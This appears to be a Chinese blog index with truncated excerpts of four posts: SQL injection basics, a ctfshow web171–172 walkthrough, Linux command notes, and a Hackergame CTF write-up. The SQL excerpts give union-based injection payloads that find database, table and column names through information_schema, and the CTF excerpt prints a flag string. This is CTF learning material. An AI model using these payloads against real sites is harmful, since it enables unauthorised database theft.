sql注入基础
0×01原理攻击者在进行数据库查询时恶意构造查询语句,使得查询语句能够得到任意攻击者想要的信息(永远不要相信用户的输入) 0×02类型按查询来分可分为字符型和数字型(主要区别是字符型需要闭合而数字型无闭合) 按注入方式可分为union注入、报错注入、盲注、文件上传注入等 判断方法判断有无注入首先在参数后加上单引号(无论字符型还是数字型都会因单引号个数不匹配报错) 判断注入类型1.输入and 1=1和and 1=2 若均为正常则为字符型,第二个报错即为数字型 2.输入id=1和id=2-1 若结果相同则为数字型,第二个不同则为字符型 以ctfshow171举例 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit...
ctfshow-web入门-sql注入
无过滤注入web171简单的查询语句,结合上方sql查询语句用-1‘ or username = ‘flag查询flag web172进select中无过滤2进行注入 先判断注入类型为字符型,用单引号闭合,再判断回显位置 先爆数据库名 -1' union select 1,database()--+ 爆表名 -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'--+ 判断两个可疑表名ctfshow_user和ctfshow_user2 分别爆列名 -1' union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user'--+-1' union select...
linux常见指令
1.ls:列出当前目录所有文件ls -l:列出文件及属性第一列 第1个字母为d表示为目录,为-表示为普通文件 2-4个字母:rwx表示read,write,执行,表示文件所有者权限 5-7个字母:表示该组内其他用户权限 8-10个字母:表示除该组其他用户权限 第五列 表示文件大小 第六七八列 表示修改时间 ls -a:查看隐藏文件第一个字符为.表示为隐藏文件 ls -la:列出文件及属性(包括隐藏文件)注:大部分命令行以ll代表ls -l的缩写 2.cd:进入一个目录(格式cd 目录名)cd ..:回到上一层目录cd .:进入当前目录cd ../..:进入上上层目录cd -:进入上一次进入的目录3.pwd:打印当前路径4.cat/tail/head:查看文件内容cat 文件名:查看当前文件内容快捷键: Tab键:对目录中名字唯一的文件,如README,输入R后按Tab键自动补齐 上下键:自动输入上一个或下一个使用的命令 head 文件名:只看文件开头内容head –lines=x 文件名:只看文件开头前x行内容tail...
Hackergame复现
签到 错误输入一次后在url框中发现false,修改为true后获得flag 喜欢做签到的 CTFer 你们好呀题目要求ctf战队招新网站,在承办单位中找到,进去后为Linux终端 flag1通过help命令找出可用命令,再用ls -la命令找到隐藏的.flag文件,cat .flag获得 flag{0k_175_a_h1dd3n_s3c3rt_f14g___please_join_us_ustc_nebula_anD_two_maJor_requirements_aRe_shown_somewhere_else} flag2输出.oh-you-found-it的内容,提示考虑其他目录,进入Awards时提示要管理员权限,但是sudo...